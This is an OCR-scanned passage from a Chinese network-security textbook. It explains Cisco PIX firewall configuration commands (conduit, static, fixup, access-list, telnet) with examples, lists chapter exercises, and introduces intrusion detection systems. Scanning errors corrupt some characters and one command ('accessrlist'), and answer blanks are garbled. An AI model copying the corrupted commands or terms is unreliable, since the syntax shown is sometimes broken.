8. 管道 命令 (conduit) 

使 用 static 命令 可 以 在 一 个 内 网 IP 地 址 和 一 个 外 网 IP 地 址 之 间 创 建 一 个 静态 映射 ， 
但 从 外 部 到 内 部 接口 的 连接 仍然 会 被 Pix 防火 墙 的 自 适 应 安全 算法 (asa) 阻 挡 ,conduit 命 
令 用 来 允许 数据 流 从 具有 和 较 低 安全 级 别 的 接口 流向 具有 和 较 高 安全 级 别 的 接口 ,例如 允许 从 
外 部 到 dmz 或 内 部 网 络 的 会 话 。 对 于 从 外 部 到 内 部 接口 的 连接 ,static 和 conduit 命令 将 一 
起 使 用 ,来 指定 会 话 的 建立 。conduit 命令 配置 语法 如 下 : 














conduit permit |deny protocol global ip port[-port] foreign ip [netmask] 
其 中 permit 表示 人 允许 访问 ,deny 表示 拒绝 访问 ;protocol 指 的 是 连接 协议 ,比如 TCP、 
UDP ICMP 等 。global_ip 指 的 是 先前 由 global 或 static 命令 定义 的 全 局 IP 地 址 , 如果 
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global_ip 为 0, 就 用 any 代替 0; 如 果 global_ip 是 一 台 主 机 ,就 用 host 命令 参数 。port 指 的 
是 服务 所 作用 的 端口 ,例如 www 使 用 80,smtp 使 用 25 等 ,可 以 通过 服务 名 称 或 端口 数字 
来 指定 端口 。foreign_ip 表示 可 访问 global_ip 的 外 网 IP 地 址 ,对 于 任意 主机 ,可 以 用 any 
表示 ;如 果 foreign_ip 是 一 台 主 机 ,就 用 host 命令 参数 。 

例 11: Pix525(config)#conduit permit tcp host 133. 0. 0. 1 eq www any 

表示 允许 任何 外 部 主机 对 全 局 地 址 为 133. 0. 0. 1 的 主机 进行 http 访问 。 其 中 使 用 eq 
和 一 个 端口 来 允许 或 拒绝 对 这 个 端口 的 访问 。eq ftp 就 是 指 允 许 或 拒绝 只 对 ftp 的 访问 。 

例 12: Pix525(config) # conduit deny tcp any eq ftp host 61. 144. 51. 89 

表示 不 允许 外 部 主机 61. 144. 51. 89 对 任何 全 局 地 址 进行 ftp 访问 。 

例 13: Pix525(config) # conduit permit icmp any any 

表示 允许 icemp 消息 向 内 部 和 外 部 通过 。 

例 14: Pix525(config) # static (inside, outside) 61. 144. 51. 62 192. 168. 0. 3 

Pix525(config) # conduit permit tcp host 61. 144. 51. 62 eq www any 

这 个 例子 说 明 static 和 conduit 的 关系 。192. 168. 0. 3 在 内 网 中 是 一 台 Web 服务 器 ， 
现在 希望 外 网 的 用 户 能 够 通过 Pix 防火 墙 得 到 Web 服务 ,所 以 先 做 static 静态 映射 : 
192. 168. 0. 3 一 61. 144. 51. 62( 全 局 地 址 )。 然 后 利用 conduit 命令 允许 任何 外 部 主机 对 全 
局 地 址 61. 144. 51. 62 进行 http 访问 。 

9. 侦 听 命令 (fixup) 

fixup 命令 的 作用 是 启用 、 禁 止 改变 一 个 服务 或 协议 通过 Pix 防火 墙 ,由 fixup 命令 指 
定 的 端口 是 Pix 防火 墙 要 侦 听 服务 的 端口 。 

例 15: Pix525(config) # fixup protocol ftp 21 

表示 启用 ftp 协议 ,并 指定 ftp 的 端口 号 为 21 。 

10. 访问 控制 列表 命令 (access-list) 

访问 控制 列表 是 指令 列表 ,这 些 指令 列表 用 来 告诉 路 由 器 哪些 数据 包 可 以 接收 .哪些 数 
据 包 需要 拒绝 。access-list 命令 有 permit 和 deny 两 个 功能 ,网 络 协议 一 般 有 IP、TCP、 
UDP ICMP 等 。 

例 16: Pix525(config) # accessrlist 100 permit ip any host 222. 20. 16. 254 eq www 

Pix525(config) # access-list 100 deny ip any any 

Pix525(config) # access-group 100 in interface outside 

表示 只 允许 访问 主机 222. 20. 16. 254 的 WWW 服务 。 

11. 设置 telnet 

在 默认 情况 下 ,Pix 的 以 太 端 口 是 不 允许 通过 telnet 命令 访问 的 ,这 一 点 与 路 由 器 有 区 
别 。 通 过 inside 端口 能 用 telnet 命令 访问 到 PIX 防火 墙 就 可 以 了 。 如 要 从 outside 端口 用 
telnet 访问 到 Pix 防火 墙 ,还 要 进行 一 些 安全 配置 。 

telnet 的 配置 语法 如 下 : 


telnet local ip [netmask] 


其 中 local_ip 表示 被 授权 通过 telnet 访问 到 Pix 的 IP 地 址 。 如 果 不 设 此 项 ,Pix 的 配 
置 只 能 从 console 端口 进行 。 
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12. 显示 与 保存 结果 
显示 结果 的 命令 为 show config。 
保存 结果 的 命令 为 write memory。 


习 题 
一 、 选 择 题 
1. 为 保障 网 络 安全 ,防止 外 部 网 对 内 部 网 的 侵犯 ,多 在 内 部 网 络 与 外 部 网 络 之 间 设 
) 。 
A. 密码 认证 B. 入 侵 检测 C. 数字 签名 D. 防火 墙 
2 以 下 ( ) 不 是 实现 防火 墙 的 主流 技术 。 
A. 包 过 滤 技 术 B. 应 用 级 网 关 技 术 
C. 代理 服务 器 技术 D. NAT 技术 


3. 关于 防火 墙 的 功能 ,以 下 ( ) 是 错误 的 。 
A. 防火 墙 可 以 检查 进出 内 部 网 的 通信 流 
B. 防火 墙 可 以 使 用 应 用 网 关 技 术 在 应 用 层 上 建立 协议 过 滤 和 转发 功能 
C. 防火 墙 可 以 使 用 过 滤 技 术 在 网 络 层 对 数据 包 进行 选择 
D. 防火 墙 可 以 阻止 来 自 内 部 的 威胁 和 攻击 
4. 关于 防火 墙 ,以 下 ( ) 是 错误 的 。 
A. 防火 墙 能 隐藏 内 部 IP 地 址 
B. 防火 墙 能 控制 进出 内 网 的 信息 流向 和 信息 包 
C. 防火 墙 能 提供 VPN 功能 
D. 防火 墙 能 阻止 来 自 内 部 的 威胁 
5. 关于 防火 墙 技术 的 描述 中 ,正确 的 是 ( % 
A. 防火 墙 不 能 支持 网 络 地 址 转换 
B. 防火 墙 可 以 布置 在 企业 内 部 网 和 Internet 之 间 
C. 防火 墙 可 以 查 、 杀 各 种 病毒 
D. 防火 墙 可 以 过 滤 各 种 垃圾 文件 
6. 在 防火 墙 的 “访问 控制 ”应 用 中 ,关于 内 网 ,外 网 .DMZ 区 三 者 访问 关系 的 说 法 中 错 


误 的 是 ( )。( 多 选 题 ) 


A. 内 网 可 以 访问 外 网 B. 内 网 可 以 访问 DMZ 区 

C. DMZ 区 可 以 访问 内 网 D. 外 网 可 以 访问 DMZ 区 
7. 防火 墙 是 指 (  )。 

A. 一 种 特定 软件 B. 一 种 特定 硬件 

C. 执行 访问 控制 策略 的 一 组 系统 D. 一 批 硬 件 的 总 称 
8. 包 过 滤 防 火 墙 一 般 不 需要 检查 的 部 分 是 (。”)。 

A. 源 IP 地址 和 目的 IP 地 址 B. 源 端口 和 目的 端口 

C. 协议 类 型 D. TCP 序列 号 
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9. 代理 服务 作为 防火 墙 技术 主要 在 OSI 的 ( ) 实 现 。 





A. 网 络 层 B. 表示 层 C. 应 用 层 D. 数据 链 路 层 
10. 关于 屏蔽 子 网 防火 墙 体系 结构 中 堡 全 主机 的 说 法 ,错误 的 是 ( ”)。 
A. 不 属于 整个 防御 体系 的 核心 B. 位 于 DMZ 区 
C. 可 被 认为 是 应 用 层 网 关 D. 可 以 运行 各 种 代理 程序 
二 、 填空 题 
1. 防火 墙 是 建立 在 现代 通信 网 络 技术 和 信息 安全 技术 基础 上 的 应 用 性 安全 技术 ,并 越 
来 越 多 地 应 用 于 网 与 网 之 间 。 
2. 根据 防范 的 方式 和 侧重 点 的 不 同 ,防火 墙 技术 可 分 成 很 多 类 型 ,但 总 体 来 讲 可 分 为 
三 大 类 : 防火 墙 、 防火 墙 和 防火 墙 。 








3. 包 过 滤 防 火 墙 根据 数据 包头 中 的 站 
等 参数 ,或 它们 的 组 合 来 确定 是 否 允 许 该 数据 包 通过 。 
4. 实际 上 就 是 一 台 小 型 的 带 有 数据 检测、 过滤 ”功能 的 透明 “代理 服务 器 ”， 
它 工 作 在 应 用 层 , 针 对 不 同 的 应 用 协议 ,需要 建立 不 同 的 服务 代理 。 
5. 状态 检测 防火 墙 气 弃 了 包 过 滤 防 火 墙 仅 检查 数据 包 的 IP 地 址 等 几 个 参数 ,而 不 关 











心 数据 包 连 接 状 态 变化 的 缺点 ,在 防火 墙 的 核心 部 分 建立 表 , 并 将 进出 网 络 的 数据 
当成 一 个 个 的 会 话 ,利用 该 表 跟 踪 每 一 个 会 话 状态 。 

6. 在 传统 的 路 由 器 中 增加 功能 就 能 形成 包 过 滤 路 由 器 防火 墙 。 

7. 双 宿 主 主机 防火 墙 结构 具有 两 个 接口 ,其 中 一 个 接口 接 网 络 , 另 一 个 接口 
接 网 络 。 

8. 屏蔽 子 网 防火 墙 结构 采用 了 两 个 包 过 滤 路 由 器 和 一 个 堡垒 主机 ,在 内 外 网 络 之 间 建 
立 了 一 个 被 隔离 的 子 网 ,通常 称 为 区 ,可 以 将 置 于 该 区 中 ,解决 了 服务 器 
位 于 内 部 网 络 带 来 的 不 安全 问题 。 

9. 在 Windows 系统 中 ,不 同 的 网 络 位 置 可 以 有 不 同 的 Windows 防火 墙 设置 ,可 以 选 
择 的 网 络 位 置 主要 包括 、 、 共 3 种 。 

10. 具有 高 级 安全 性 的 Windows 防火 墙 是 一 种 状态 防火 墙 , 它 默认 阻止 流 
量 ,默认 允许 流量 。 

11. 具有 高 级 安全 性 的 Windows 防火 墙 可 以 请 求 或 要 求 计算 机 在 通信 之 前 互相 进 
行 ,并 在 通信 时 使 用 或 。 

三 、 简 答题 


1. 防火 墙 的 主要 功能 是 什么 ? 

2. 包 过 滤 防 火 墙 的 优 缺 点 是 什么 ? 

3. 比较 防火 墙 与 路 由 器 的 区 别 。 

4. 防火 墙 不 能 防范 什么 ? 

四 、 操 作 练 习题 

设计 一 条 防火 墙 安全 规则 ,防范 别人 使 用 Telnet(TCP 端口 号 为 23) 命 令 登录 自己 的 计 
算 机 。 
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【项 目 目标 】 


(1) 了 解 入 侵 检测 系统 的 基本 功能 。 

(2) 了 解 入 侵 检测 系统 的 基本 结构 和 分 类 。 
(3) 理解 基于 网 络 和 基于 主机 的 入 侵 检测 系统 。 
(4) 掌握 入 侵 检测 软件 的 使 用 方法 。 

(5) 了 解 入 侵 防护 系统 。 


81 项 目 提出 


张 先生 开办 的 公司 发 展 势头 良好 ,网 站 的 点 击 量 也 逐日 增加 。 由 此 , 张 先生 也 更 加 愿意 
投入 资金 ,添置 了 防火 墙 杀 毒 软件 等 来 保护 自己 的 网 站 。 尽 管 如 此 ,他 的 网 站 还 是 会 不 时 
遭 到 莫名 的 攻击 。 

新 来 的 网 络 管理 员 小 李 了 解 了 该 网 站 的 大 概 情况 后 ,他 向 张 先生 建议 ,只 配备 防火 墙 和 
杀毒 软件 还 不 够 ,还 需要 一 个 强大 的 技术 来 保证 网 络 的 安全 , 那 就 是 入侵 检 测 技术 。 

在 采纳 了 小 李 的 建议 后 ,网 站 的 安全 状况 有 了 明显 的 好 转 。 


82 项 目 分 析 


防火 墙 尽管 具有 强大 的 抵御 外 部 攻击 的 功能 ,能 保护 系统 不 受 未 经 授权 访问 的 侵扰 ,但 
却 无 法 阻止 来 自 内 部 人 员 的 攻击 。 在 网 络 安全 管理 中 ,除了 消极 被 动 地 阻止 攻击 行为 ,还 应 
该 主动 出 击 去 检测 那些 正在 实施 的 攻击 行为 ,进一步 预防 安全 隐患 的 发 生 。 

传统 的 防火 墙 在 工作 时 ,就 像 深 宅 大 院 虽 有 高 大 的 院 墙 , 却 不 能 挡住 小 老鼠 甚至 是 家 贼 
的 偷袭 一 样 , 因 为 人 侵 者 可 以 找到 防火 墙 背后 可 能 敞开 的 后 门 。 另 外 ,防火 墙 完全 不 能 阻止 
来 自 网 络 内 部 的 攻击 ,通过 调查 发 现 ,65% 左 右 的 攻击 来 自 于 网 络 内 部 ,对 于 企业 内 部 心怀 
不 满 的 员工 来 说 ,防火 墙 形同虚设 。 还 有 .由 于 性 能 的 限制 ,防火 墙 不 能 提供 实时 的 入 侵 检 
测 能 力 ,而 这 一 点 ,对 于 现在 层出不穷 的 攻击 技术 来 说 是 至 关 重 要 的 。 最 后 ,防火 墙 对 于 病 
毒 也 束手无策 。 因 此 ,以 为 在 Internet 入 口 处 部 署 防火 墙 系统 就 足够 安全 的 想法 是 不 切实 
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际 的。 根据 这 一 问题 ,人 们 设计 出 了 入 侵 检测 系统 (IDS) ,IDS 可 以 弥补 防火 墙 的 不 足 , 为 网 
络 安全 提供 实时 的 人 侵 检测 及 采取 相应 的 防护 手段 ,例如 ,记录 证 据 用 于 跟踪 恢复. 断 开 网 
络 连接 等 。 

如 果 说 防火 墙 是 一 幢 大 楼 的 门卫 ,那么 人 侵 检 测 和 防御 就 是 这 幢 大 楼 里 的 监视 系统 。 
一 旦 有 入 侵 大 楼 的 行为 ,或 内 部 人 员 有 越界 行为 ,实时 监视 系统 就 会 发 现 情况 并 发 出 警报 。 


83 相关 知识 点 


8.3.1 入 侵 检 测 系 统 概述 


和信 侵 检测 系统 (intrusion detection system,IDS) 是 一 类 专门 面向 网 络 入 侵 的 安全 监测 
系统 , 它 从 计算 机 网 络 系统 中 的 若干 关键 点 收集 信息 ,并 分 析 这 些 信息 ,查看 网 络 中 是 否 有 
违反 安全 策略 的 行为 和 唱 到 袭击 的 迹象 。 入 侵 检测 被 认为 是 防火 墙 之 后 的 第 二 道 安全 防 
线 , 在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进行 监测 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操 
作 的 实时 保护 。 

入 侵 检测 系统 的 基本 功能 有 以 下 几 个 方面 。 

(1) 检测 和 分 析 用 户 及 系统 的 活动 。 

(2) 审计 系统 配置 和 漏洞 。 

(3) 识别 已 知 攻击 。 

(4) 统计 分 析 异 常 行为 。 

(5) 评估 系统 关键 资源 和 数据 文件 的 完整 性 。 

(6) 对 操作 系统 的 审计 、 追 踪 \ 管 理 , 并 识别 用 户 违反 安全 策略 的 行为 。 

一 个 成 功 的 入 侵 检测 系统 ,不 但 可 使 系统 管理 员 时 刻 了 解 网 络 系统 (包括 程序 文件 和 
硬件 设备 等 ) 的 任何 变更 ,还 能 给 网 络 安全 策略 的 制定 提供 指南 。 同 时 , 它 应 该 是 管理 和 配 
置 简单 ,使 非 专业 人 员 也 能 容易 地 获得 网 络 安 人 全。 当然, 入侵 检 测 的 规模 还 应 根据 网 络 威 
胁 . 系 统 构造 和 安全 需求 的 改变 而 改变 。 和 人 侵 检测 系统 在 发 现 人 侵 后 ,应 及 时 做 出 响应 , 包 
括 切 断 网 络 连接 .记录 事件 和 报警 等 。 

目前 ,入 侵 检 测 系统 主要 以 模式 匹配 技术 为 主 , 并 结合 异常 匹配 技术 。 从 实现 方式 上 一 
般 分 为 两 种 : 基于 主机 和 基于 网 络 , 而 一 个 完备 的 入 侵 检测 系统 则 一 定 是 基于 主机 和 基于 
网 络 这 两 种 方式 兼备 的 分 布 式 系统 。 另 外 ,能 够 识别 的 入 侵 手段 数量 的 多 少 、 最 新 入 侵 手 段 
的 更 新 是 否 及 时 也 是 评价 入 侵 检测 系统 的 关键 指标 。 


8.3.2 入 侵 检 测 系 统 的 基本 结构 


为 了 解决 入侵 检测 系统 之 间 的 兼容 性 和 互 操作 性 ,国际 上 的 一 些 研究 组 织 开 展 了 研究 
入 侵 检 测 系统 的 标准 化 工作 ,其 中 美国 国防 部 高 级 研究 计划 署 (DARPA) 提 出 的 建议 是 公 
共 入 侵 检测 框架 (CIDF)。CIDF 阐述 了 一 个 人 侵 检 测 系统 的 通用 模型 , 它 将 一 个 人 侵 检测 
系统 分 为 以 下 四 个 基本 组 件 : 事件 发 生 器 、 事 件 分 析 器 、 事 件数 据 库 和 响应 单元 。 入 侵 检 测 
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系统 的 组 成 如 图 8-1 所 示 。 





事件 发 生 器 








收集 用 户 操作 与 状态 











事件 数据 库 | | 事件 分 析 器 











发 现 入 侵 








做 出 响应 响应 单元 














图 8-1 入 侵 检 测 系统 的 组 成 


CIDF 将 IDS 需要 分 析 的 数据 统称 为 事件 , 它 可 以 是 网 络 中 的 数据 包 , 也 可 以 是 从 系统 
日 志 或 其 他 途径 得 到 的 信息 。 


1) 事件 发 生 器 
(1) 负责 原始 数据 采集 ,并 将 收集 到 的 原始 数据 转换 为 事件 ,向 系统 的 其 他 部 分 提供 此 
事件 。 


(2) 收集 内 容 , 包 括 系统 、 网 络 数据 及 用 户 活 动 的 状态 和 行为 。 

(3) 需要 在 计算 机 网 络 系统 中 的 若干 不 同 的 关键 点 (不 同 网 段 和 不 同 主机 ) 收 集 信息 。 
包括 系统 和 网 络 的 日 志文 件 ;网 络 流量 ;系统 目录 和 文件 的 异常 变化 ;程序 执行 的 异常 行 

入 侵 检 测 系统 很 大 程度 上 依赖 于 收集 信息 的 可 靠 性 和 正确 性 ,要 保证 用 来 检测 网 络 系 
统 的 软件 的 完整 性 ,特别 是 入侵 检测 系统 软件 本 身 应 具有 坚固 性 ,防止 被 算 改 而 收集 到 错误 
的 信息 。 

2) 事件 分 析 器 

接收 事件 信息 ,并 对 其 进行 分 析 , 判 断 是 否 为 人 侵 行 为 或 异常 现象 ,最 后 将 判断 的 结果 
转变 为 告警 信息 。 分 析 方 法 主要 有 以 下 几 种 。 

(1) 模式 匹配 。 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 数据 库 进行 比较 ， 
从 而 发 现 违背 安全 策略 的 行为 。 

(2) 统计 分 析 。 首 先 给 系统 对 象 (如 用 户 、 文 件 .目录 设备 等 ) 创 建 一 个 统计 描述 ,统计 
正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失 败 次 数 和 延 时 等 ) ;测量 属性 的 平均 值 和 偏 
差 将 被 用 来 与 网 络 、 系 统 的 行为 进行 比较 ,任何 观察 值 (应 改 为 “测量 属性 值 ”) 在 正常 值 范围 
之 外 时 ,就 认为 有 入 侵 发 生 。 

(3) 完整 性 分 析 ( 往 往 用 于 事后 分 析 )。 主 要 检测 某 个 文件 或 对 象 是 否 被 更 改 。 

3) 事件 数据 库 

存放 各 种 中 间 和 最 终 数据 的 地 方 , 它 可 以 是 复杂 的 数据 库 , 也 可 以 是 简单 的 文本 文件 。 
从 事件 发 生 器 或 事件 分 析 器 接收 数据 ,一 般 会 将 数据 进行 较 长 时 间 的 保存 。 

4) 响应 单元 

根据 告警 信息 做 出 反应 ,是 IDS 中 的 主动 武器 ,可 做 出 强烈 反应 ,如 切断 连接 ,改变 文 
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件 属性 等 ,也 可 以 只 做 出 简单 的 报警 。 
以 上 4 个 组 件 只 是 逻辑 实体 ,一 个 组 件 可 能 是 某 台 计算 机 上 的 一 个 进程 甚至 线程 ,也 可 
能 是 多 个 计算 机 上 的 多 个 进程 ,它们 以 GIDO( 统 一 入 侵 检测 对 象 ) 格 式 进行 数据 交换 。 


8.3.3 入 侵 检 测 系 统 的 分 类 


1. 根据 分 析 方 法 和 检测 原理 分 类 

(1) 基于 异常 的 人 侵 检测 。 首 先 总 结 出 正常 操作 应 该 具有 的 特征 (用 户 轮 廓 ), 当 用 户 
活动 与 正常 行为 有 重大 偏离 时 即 被 认为 是 入 侵 。 

(2) 基于 误 用 的 人 侵 检测 。 收 集 非 正常 操作 时 的 行为 特征 ,建立 相关 的 特征 库 , 当 被 监 
测 的 用 户 或 系统 行为 与 库 中 的 记录 相 匹配 时 ,系统 就 认为 这 种 行为 是 入 侵 。 

2. 根据 数据 来 源 分 类 

(1) 基于 主机 的 入 侵 检 测 系统 (HIDS)。 系 统 获取 数据 的 依据 是 系统 运行 所 在 的 主机 ， 
保护 的 目标 也 是 系统 运行 所 在 的 主机 。 

(2) 基于 网 络 的 入 侵 检 测 系统 (NIDS)。 系 统 获 取 数 据 的 依据 是 网 络 传输 的 数据 包 , 保 
护 的 是 网 络 的 正常 运行 。 

(3) 分 布 式 人 侵 检 测 系统 (混合 型 )。 将 基于 网 络 和 基于 主机 的 入侵 检 测 系统 有 机 地 结 
合 在 一 起 。 

3. 根据 体系 结构 分 类 

(1) 集中 式 。 集 中 式 结构 的 IDS 可 能 有 多 个 分 布 于 不 同 主机 上 的 审计 程序 ,但 只 有 一 
个 中 央 和 人 侵 检测 服务 器 。 审 计 程 序 把 当地 收集 到 的 数据 踪迹 发 送 给 中 央 服 务 器 进行 分 析 处 
理 。 随 着 网 络 规模 的 增加 ,主机 审计 程序 和 服务 器 之 间 传 送 的 数据 就 会 剧 增 , 导 致 网 络 性 能 
大 大 降低 。 并 且 一 旦 中 央 服务 器 出 现 问题 ,整个 系统 就 会 陷 人 瘫痪 。 

(2) 分 布 式 。 分 布 式 结构 的 IDS 就 是 将 中 央 检 测 服务 器 的 任务 分 配给 多 个 基于 主机 的 
IDS。 这 些 IDS 不 分 等 级 ,各 司 其 职 , 负 责 监控 当地 主机 的 某 些 活动 。 所 以 ,其 可 伸缩 性 、 安 
全 性 都 得 到 提高 ,但 维护 成 本 也 高 了 很 多 ,并 且 增 加 了 所 监控 主机 的 工作 负荷 。 

4. 根据 工作 方式 分 类 

(1) 离线 检测 。 离 线 检测 又 称 脱 机 分 析 检测 系统 ,就 是 在 行为 发 生 后 ,对 产生 的 数据 进 
行 分 析 , 而 不 是 在 行为 发 生 的 同时 进行 分 析 , 从 而 检测 入侵 活动 , 它 是 非 实时 工作 的 系统 。 
如 对 日 志 的 审查 ,对 系统 文件 的 完整 性 检查 等 都 属于 这 种 。 一 般 而 言 , 脱 机 分 析 也 不 会 间隔 
很 长 时 间 , 所 谓 的 脱 机 只 是 与 联机 相对 而 言 的 。 

(2) 在 线 检测 。 又 称 为 联机 分 析 检 测 系统 ,就 是 在 数据 产生 或 者 发 生 改 变 的 同时 对 其 
进行 检查 ,以 便 发 现 攻 击 行为 , 它 是 实时 联机 检测 系统 。 这 种 方式 一 般 用 于 网 络 数据 的 实时 
分 析 , 有 时 也 用 于 实时 主机 审计 分 析 。 它 对 系统 资源 的 要 求 比较 高 。 


8.3.4 基于 网 络 和 基于 主机 的 入 侵 检测 系统 


1. 基于 网 络 的 入 侵 检 测 系统 
基于 网 络 的 入 侵 检 测 系统 (NIDS) 放 置 在 比较 重要 的 网 段 内 ,不 停 地 监视 网 段 中 的 各 
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种 数据 包 。 对 每 一 个 数据 包 进 行 特征 分 析 。 如 果 数 据 包 与 系统 内 置 的 某 些 规则 吻合 ,人 
侵 检测 系统 就 会 发 出 警报 甚至 直接 切断 网 络 连接 。 目 前 ,大 部 分 人 侵 检测 系统 是 基于 网 
络 的 。 

一 个 典型 的 NIDS 如 图 8-2 所 示 ,一 个 传感器 被 安装 在 防火 墙 外 以 探查 来 自 Internet 的 
攻击 。 另 一 个 传感器 安装 在 网 络 内 部 以 探查 那些 已 穿 透 防火 墙 的 入 侵 以 及 内 部 网 络 入 侵 和 
威胁 。 


IDS 传 感 器 


内 部 网 Internet 
控制 台 防火 墙 








IDS 传 感 器 


图 8-2 基于 网 络 的 入侵 检测 系统 


基于 网 络 的 入 侵 检测 系统 使 用 原始 网 络 数据 包 作 为 数据 源 。 基 于 网 络 的 IDS 通常 利 
用 一 个 运行 在 混杂 模式 下 的 网 络 适配器 来 实时 监视 并 分 析 通 过 网 络 的 所 有 数据 包 。 一旦 检 
测 到 了 攻击 行为 ,NIDS 的 响应 模块 就 提供 多 种 选项 用 于 通知 、 报 警 ,并 对 攻击 行为 采取 相 
应 的 措施 。 采 取 的 措施 因 系 统 而 异 ,但 通常 都 包括 通知 管理 员 、 中 断 连 接 并 且 / 或 为 法 庭 分 
析 和 证 据 收 集 而 做 的 会 话 记 录 。 

基于 网 络 的 IDS 已 经 广泛 成 为 安全 策略 的 实施 中 的 重要 组 件 , 它 有 许多 仅 靠 基 于 主机 
的 人 侵 检 测 系统 无 法 提供 的 优点 。 

(1) 拥有 成 本 较 低 。 基 于 网 络 的 IDS 可 在 几 个 关键 访问 点 上 进行 策略 配置 ,以 观察 发 
往 多 个 系统 的 网 络 通信 。 所 以 它 不 要 求 在 许多 主机 上 装载 并 管理 软件 。 由 于 需 监测 的 点 较 
少 , 因 此 对 于 一 个 公司 的 环境 来 说 ,拥有 成 本 很 低 。 

(2) 检测 基于 主机 的 IDS 漏 掉 的 攻击 。 基 于 网 络 的 IDS 检查 所 有 数据 包 的 头 部 从 而 发 
现 恶意 的 和 可 疑 的 行为 迹象 。 基 于 主机 的 IDS 无 法 查看 数据 包 的 头 部 ,所 以 它 无 法 检测 到 
这 一 类 型 的 攻击 。 例 如 ,许多 来 自 于 IP 地 址 的 拒绝 服务 型 (DoS) 和 碎片 包 型 (Teardrop) 的 
攻击 只 能 在 它们 经 过 网 络 时 ,检查 包 的 头 部 才能 被 发 现 。 这 种 类 型 的 攻击 都 可 以 在 基于 网 
络 的 IDS 中 通过 实时 监测 网 络 数据 包 流 而 被 发 现 。 

基于 网 络 的 IDS 可 以 检查 有 效 负载 的 内 容 ,查找 用 于 特定 攻击 的 指令 或 语法 。 例 如 ， 
通过 检查 数据 包 有 效 负载 可 以 查 到 黑客 软件 ,而 使 正在 寻找 系统 漏洞 的 攻击 者 毫 无 察 
觉 。 由 于 基于 主机 的 IDS 不 检查 有 效 负载 .所 以 不 能 辨认 有 效 负 载 中 所 包含 的 攻击 
信息 。 

(3) 攻击 者 不 易 转 移 证 据 。 基 于 网 络 的 IDS 使 用 正在 发 生 的 网 络 通信 进行 实时 攻击 的 
检测 ,所 以 攻击 者 无 法 转移 证 据 。 被 捕获 的 数据 不 仅 包括 攻击 的 方法 ,而 且 还 包括 可 识别 的 
黑客 身份 及 对 其 进行 起 诉 的 信息 。 许 多 黑客 都 熟知 审计 记录 ,他 们 知道 如 何 操纵 这 些 文件 
掩盖 他 们 的 入 侵 痕 迹 ,如 何 阻 止 需要 这 些 信 息 的 基于 主机 的 IDS 去 检测 入 侵 。 

(4) 实时 检测 和 响应 。 基 于 网 络 的 IDS 可 以 在 恶意 及 可 疑 的 攻击 发 生 的 同时 将 其 检测 
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出 来 ,并 做 出 更 快 的 通知 和 响应 。 例 如 ,一 个 基于 TCP 的 对 网 络 进行 的 拒绝 服务 攻击 可 以 
通过 将 基于 网 络 的 IDS 发 出 TCP 复位 信号 ,在 该 攻击 对 目标 主机 造成 破坏 前 将 其 中 断 。 而 
基于 主机 的 系统 只 有 在 可 疑 的 登录 信息 被 记录 下 来 以 后 才能 识别 攻击 并 做 出 反应 。 而 这 时 
关键 系统 可 能 早已 遭 到 了 破坏 ,或 是 运行 基于 主机 的 IDS 的 系统 已 被 摧毁 。 实 时 IDS 可 根 
据 预 定义 的 参数 做 出 快速 反应 ,这 些 反应 包括 将 攻击 设 为 监视 模式 以 收集 信息 ,立即 中 止 攻 
击 等 。 

(5) 检测 未 成 功 的 攻击 和 不 良 意图 。 基 于 网 络 的 IDS 增加 了 许多 有 价值 的 数据 ,以 判 
别 不 良 意图 。 即 便 防火 墙 可 以 正在 拒绝 这 些 尝 试 ,位 于 防火 墙 之 外 的 基于 网 络 的 IDS 可 以 
查 出 躲 在 防火 墙 后 的 攻击 意图 。 基 于 主机 的 IDS 无 法 查 到 从 未 攻击 到 防火 墙 内 主机 的 未 
遂 攻 击 ,而 这 些 丢 失 的 信息 对 于 评估 和 优化 安全 策略 是 至 关 重 要 的 。 

(6) 操作 系统 无 关 性 。 基 于 网 络 的 IDS 作为 安全 监测 资源 ,与 主机 的 操作 系统 无 关 。 
与 之 相 比 ,基于 主机 的 IDS 必须 在 特定 的 、 没 有 遭 到 破坏 的 操作 系统 中 才能 正常 工作 ,生成 
有 用 的 结果 。 

基于 网 络 的 入侵 检测 系统 也 有 弱点 : 只 检查 直接 连接 网 段 的 通信 ,不 能 检测 在 不 同 网 
段 的 网 络 包 ,在 交换 以 太 网 环境 中 会 出 现 监测 范围 的 局 限 ; 很 难 实现 一 些 复杂 的 需要 大 量 计 
算 与 分 析 时 间 的 攻击 检测 ;处 理 加 密 的 会 话 过 程 较 困 难 。 

2. 基于 主机 的 入 侵 检 测 系 统 

基于 主机 的 入侵 检测 系统 (HIDS) 通 常 是 安装 在 被 重点 检测 的 主机 之 上 ,主要 是 对 该 主 
机 的 网 络 实时 连接 以 及 系统 审计 日 志 进 行 智 能 分 析 和 判断 。 如 果 其 中 主体 活动 十 分 可 疑 
(特征 或 违反 统计 规律 ), 入 侵 检 测 系统 就 会 采取 相应 措施 。 

基于 主机 的 IDS 使 用 验证 记录 ,自动 化 程度 大 大 提高 ,并 发 展 了 精密 的 可 迅速 做 出 响 
应 的 检测 技术 。 通 常 , 基 于 主机 的 IDS 可 监 探 系统 、 事 件 和 Windows 下 的 安全 记录 以 及 
UNIX 环境 下 的 系统 记录 。 当 有 文件 发 生变 化 时 ,IDS 将 新 的 记录 条 目 与 攻击 标记 相 比 
较 , 看 它们 是 否 匹配 。 如 果 匹 配 , 系 统 就 会 向 管理 员 报 警 并 向 别 的 目标 报告 ,以 采取 
措施 。 

基于 主机 的 IDS 在 发 展 过 程 中 融入 了 其 他 技术 。 对 关键 系统 文件 和 可 执行 文件 的 入 
侵 检测 的 一 个 常用 方法 ,是 通过 定期 检查 校 验 和 进行 的 ,以 便 发 现 意外 的 变化 。 反 应 的 快慢 
与 轮 询 间隔 的 频率 有 直接 的 关系 。 许 多 IDS 产品 都 是 监听 端口 的 活动 ,并 在 特定 端口 被 访 
问 时 向 管理 员 报 警 。 这 类 检测 方法 将 基于 网 络 的 入侵 检测 的 基本 方法 融和 基于 主机 的 检测 
环境 中 。 

尽管 基于 主机 的 人 侵 检查 系统 不 如 基于 网 络 的 入 侵 检 测 系统 快捷 ,但 它 确实 具有 基于 
网 络 的 IDS 无 法 比拟 的 优点 。 这 些 优 点 包括 : 更 好 地 辨识 分 析 、 对 特殊 主机 事件 的 紧密 关 
注 及 低廉 的 成 本 。 基 于 主机 的 入 侵 检测 系统 有 如 下 优点 。 

